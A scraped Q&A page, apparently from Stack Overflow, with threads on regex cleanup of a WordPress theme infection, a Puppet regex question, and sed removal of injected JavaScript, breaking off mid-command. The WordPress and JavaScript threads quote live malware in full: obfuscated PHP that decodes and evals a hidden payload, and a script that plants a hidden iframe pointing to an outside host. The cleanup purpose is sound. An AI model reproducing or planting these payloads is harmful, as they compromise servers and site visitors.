Sublime Text regex to remove wordpress themes files infection - regex

I have a client who had his Wordpress website infected by the famous newsletter plugin/SEO worm.
So I started from a fresh Wordpress install, but his custom theme is only available in the infected version and he has no backup (made by a freelancer unreachable) ...
The infection is just on the first line (I'm sure don't worry :p ) .
It looks like this
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yaagutonoj = 'Qtpz)#]341]88M4P8]37]278]225]241]334]3672%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) 25)utjm!|!*5!%x5c%x7827!hmg%y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%xc^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c7,18R#>q%x5c%x7825V<*#fop60gvodujpo)##-!#~<#%x5c%x782f%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+I#)0~:<h%x5c%x7825_t%x5c%x7825:osvufs:~5c%x7825%x5c%x7878:-6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782place("%x2f%50%x2e%52%x29%57%x65",x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)su6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78}X%x5c%x7824<!%x5c%x7825tzw>!#]y7)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#c%x787fw6*CW&)7gj6<*K)ftpmdX^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78287f_*#ujojRk3%x5c%x7860{6667824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cqp%x5c%x7825!|Z~!<##!>!2p%%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]x5c%x7825)3of)fepdof%x5c%x7"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x function fjfgg($n){returnx78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%xl}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)!%x5c%x7825t::!>!%x5c%x7824Ypp5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyidubn%x5c%x7860hfsq)!sp!*5c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%_*#fmjgk4%x5c%x7860{6~6<tfs%x%x7825s:N}#-%x5c%x7825o:W%x5c%x782x787f;!osvufs}w;*%x5c%x787f!>>%x5%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7827824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%xR25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%5-#jt0}Z;0]=]0#)2q%x5c%x782524-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf4-%x5c%x7824b!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg825h00#*<%x5c%x7825nfd)##x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878p5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y8j%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5cc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x7%x5c%x7822)!gj}1~!<2p%x5c)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3x7825yy)#}#-#%x5c%x7824-%x5c%x785h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f61]y33]68]y34]68]y33]65]y31]53]y6d]2ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78x5c%x7825eN+#Qi%x5c%x78x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%248]y83]256]y81]265]y72]254]y76]7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5cc%x5c%x7825}&;ftmbg}%x5c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x8257%x5c%x782f7###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827x5c%x7825)ppde>u%x5c%x7825V<#65,47]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dc%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbtcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bu27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR323zbe!-#jt0*?]+^?]_%x5c%x785c6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5)ufttj%x5c%x7822)gj6<^#Y#78256<pd%x5c%x7825w6Z6<.3%x5c*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj1]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rhW~%x5c%x7825fdy)##-!#~<%x5c%x7;!>!}%x5c%x7827;!>>>!}_;gve%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%%x7824*<!%x5c%x7824-%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]s%x5c%x78256~6<%x5c%x787fw6<*K){hnpd19275fubmgoj{h1:|:%x7825bss-%x5c%x7825r%x5c%x7878B)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x78x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c5c:>1<%x5c%x7825b:>1<!gpsy7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x7878:<##:>:h%x5c%x7825:<#x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x782525}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#765ww2)%x5c%x7825w%x5c%x78}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%xy39]271]y83]256]y78]#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*17824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjuc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fq%x5c%x7825:>:r%x5c%x7825:)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x786Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%42]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss134%x78%62%x35%165%x3a%146%x21%75]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]2ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<>!#]y84]275]y83]248]y83]256]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3381]y43]78]y33]65]y31]55]y85]82]y76]62x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&if((function_exists("%x6f%142%x5f%163%x74%141%x860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7877825%x5c%x785cSFWSFT%x5c%x7860%x5c%x87fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.5Ld]55#*<%x5c%x7825bG9}:c%x7822!pd%x5c%x7825)!gj}%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7f%x5c%x7860439275ttfsqnpdov{h19275jx782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5cx5c%x7827jsv%x5c%x78]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", N58]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78248]322]3]364]6]283]427]36]373P6]36]73]864y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782407825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!5c%x7860LDPT7-UFOJ%x5c%x7860GB)99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%ftpmdXA6|7**197-2qj%x5c%:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67yek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo##00;quui#>.%x5c%x7825!<*4l}%x5c%x7827;%x5c%x782h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%#00#W~!%x5c%x7825t2w)##Qtjw)2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ULL); }+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f chr(ord($n)-1);} #error_reporting(0); preg_reoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7{ $GLOBALS["%x61%156%x75%156%x61"]=1;epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]yx7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x782567825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7855c%x7825)fnbozcYufhA%x587fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x7-#w#)ldbqov>*ofmy%x5c%x783]238M7]381]211M5]67]452]88]5]52]y85]256]y6g]257]y86]267]y74f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x7%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825wx5c%x78786<C%x5c%x7827&6<*rfs%x5c3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5cbE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x725)}.;%x5c%x7860UQPMSVD!-id%x5c%24-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xfubfsdXA%x5c%x7827K6<%x5c%x787fw6*3q4}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x7822l:!}V;3q%x5c%x78985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%xfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf5!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%xA6~6<u%x5c%x78257>%x5c%%x7825z>2<!%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M/(.*)/epreg_replacetgodenjrri'; $savthdkijb = explode(chr((172-128)),'6639,47,39,57,8359,37,1364,26,8276,46,633,34,1297,67,3647,46,9998,54,6236,32,730,67,4866,53,8595,47,8086,50,4270,29,8931,45,6153,35,6589,50,3518,55,978,28,9858,23,3432,54,8976,33,4745,64,9640,65,5067,31,7543,24,1390,61,7444,31,9313,36,2878,67,883,38,8703,23,3000,48,3792,59,7023,20,5407,67,4245,25,6872,55,6686,46,8891,40,6768,55,3282,53,1911,29,8491,64,5819,62,4117,63,8762,44,1054,27,1817,52,8726,36,5683,49,8136,42,3371,38,9221,32,7281,51,4840,26,3622,25,1974,33,6847,25,5967,37,3731,61,4535,40,3242,40,7778,52,1518,62,7378,66,4299,68,452,47,8806,25,96,28,667,63,4052,65,9179,42,2420,57,3048,25,7970,70,499,68,1869,42,921,57,8234,42,7686,24,3851,65,830,53,7733,45,1143,26,2551,42,2351,69,8185,49,1741,25,9588,52,2593,52,7475,68,2502,49,3983,69,7637,49,4367,52,1451,67,1270,27,2113,60,6732,36,9060,56,3693,38,7710,23,9705,59,1680,61,6927,35,5098,23,2945,55,2645,62,9116,63,4575,60,5931,36,4477,58,3916,34,2173,59,3109,45,261,25,8322,37,4919,54,9396,21,5546,67,567,66,2232,28,1580,70,4180,30,797,33,8040,46,5351,56,6464,28,124,45,6268,48,8861,30,7332,46,355,36,7567,70,7830,42,321,34,6074,26,5264,62,5474,27,7191,53,5613,46,7900,70,6492,60,9349,47,7084,69,169,53,5881,50,1006,48,2330,21,3154,32,2260,70,5153,66,9253,60,1081,62,4973,26,2067,46,5219,45,286,35,4999,68,6408,56,1650,30,9009,51,3409,23,1766,51,9764,41,5501,45,8396,35,6100,53,4635,58,6004,70,7872,28,4693,52,5121,32,9901,68,9969,29,9417,68,9534,54,3950,33,411,41,10052,54,1234,36,8555,40,4210,35,6823,24,2707,50,3186,56,4809,31,2477,25,0,39,7153,38,8831,30,6358,50,6188,48,2007,60,3573,49,1940,34,5326,25,3073,36,1169,65,7244,37,9805,53,8642,61,222,39,8431,60,6962,61,9881,20,5659,24,9485,49,391,20,2757,67,5752,67,2824,54,4419,58,6316,42,5732,20,3486,32,3335,36,6552,37,7043,41,8178,7'); $nibnkcwalu=substr($yaagutonoj,(49971-39865),(41-34)); if (!function_exists('twwdyxiyuj')) { function twwdyxiyuj($gfkbogqkzl, $xpwveotxbw) { $bepljhengq = NULL; for($oznuhtwycd=0;$oznuhtwycd<(sizeof($gfkbogqkzl)/2);$oznuhtwycd++) { $bepljhengq .= substr($xpwveotxbw, $gfkbogqkzl[($oznuhtwycd*2)],$gfkbogqkzl[($oznuhtwycd*2)+1]); } return $bepljhengq; };} $azydrlsozu="\x20\57\x2a\40\x73\152\x76\152\x63\167\x61\147\x65\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x35\71\x36\55\x35\60\x34\51\x29\54\x20\164\x77\167\x64\171\x78\151\x79\165\x6a\50\x24\163\x61\166\x74\150\x64\153\x69\152\x62\54\x24\171\x61\141\x67\165\x74\157\x6e\157\x6a\51\x29\51\x3b\40\x2f\52\x20\145\x63\141\x6f\156\x74\151\x6a\146\x6c\40\x2a\57\x20"; $xpkuyrwixg=substr($yaagutonoj,(30604-20491),(47-35)); $xpkuyrwixg($nibnkcwalu, $azydrlsozu, NULL); $xpkuyrwixg=$azydrlsozu; $xpkuyrwixg=(455-334); $yaagutonoj=$xpkuyrwixg-1; ?>
It always start with <?php if(!isset($GLOBALS[ and ends with -1; ?>.
I tried to mess around with sed and regexes, but i can't get it working, i'm very bad with regular expressions ...
So I thought it would be easier to use the Search and replace function from Sublim Text, but I need help to make a regex that matches this pattern:
Something starting with <?php if(!isset($GLOBALS[ and ending with -1; ?>.


<\?php if\(!isset\(\$GLOBALS\[.*-1; \?>
should be enough for you.

Related

how to test with parameterized regex (e.g. /${user}/) on puppet?

I need to get a user's home directory. I decided to get it with parsing a ::getent_passwd string (which is a custom fact build as
concatenation of the contents of the /etc/passwd)
and extract the relevant information with the help of the regex.
When I test the ::getent with fixed string ("adam"), extraction works:
if "$::getent_passwd" =~ /\|adam:x:[^:]+:[^:]+:[^:]*:([^:]*):/ {
$user_home = $1
notify{"This works":}
}
But when I build a regex with the $user variable, nothing gets matched:
if "$::getent_passwd" =~ /\|${user}:x:[^:]+:[^:]+:[^:]*:([^:]*):/ {
$user_home = $1
} else {
fail{"this fails":}
}
Client and server use Puppet 3.7.3 on Ubuntu 14.04 64bit. Puppetserver uses puppetdb.

It seems, using normal variables in puppet regex is not possible:
https://docs.puppetlabs.com/puppet/latest/reference/lang_datatypes.html#regular-expressions
https://projects.puppetlabs.com/issues/4155
There is workaround proposed in the link above :
regex.erb:
<% if /(^|\s+)#{string2}(\s+|$)/.match(string1) then %>yes<% else %>no<% end %>
manifest:
$testre = template('regex.erb')
if $testre == "yes\n" { notify{"success!": } }

An answer five years later, but now there's an easy way.
For others landing here... Try the regexp constructor to build a regexp from a string :
if("abcd" =~ Regexp("${myvar}") { (...) }

sed multiline replace HTML with javascript malicious code

I've a apache server that has been infected with pieces of malicious javascript code to infect the computers that visit the web page.
What i'm trying to do is remove these pieces of malicious code using find and sed commands in a Linux server.
I have created a regular expression for sed that match almost everything but the "" end tag. It is in a new line and I can't find the way to match it as well.
The malicious code is:
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
</script>
Note of the writer: After creating the question, I can see that the web formatting cuts the previous sample. If you want to see the full sample of malicious javascript code, have a look at the text not bold in the next text and just add at the end of the text a "new line" and a "" html tag.
The regular expression that works for all the text but for the last "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+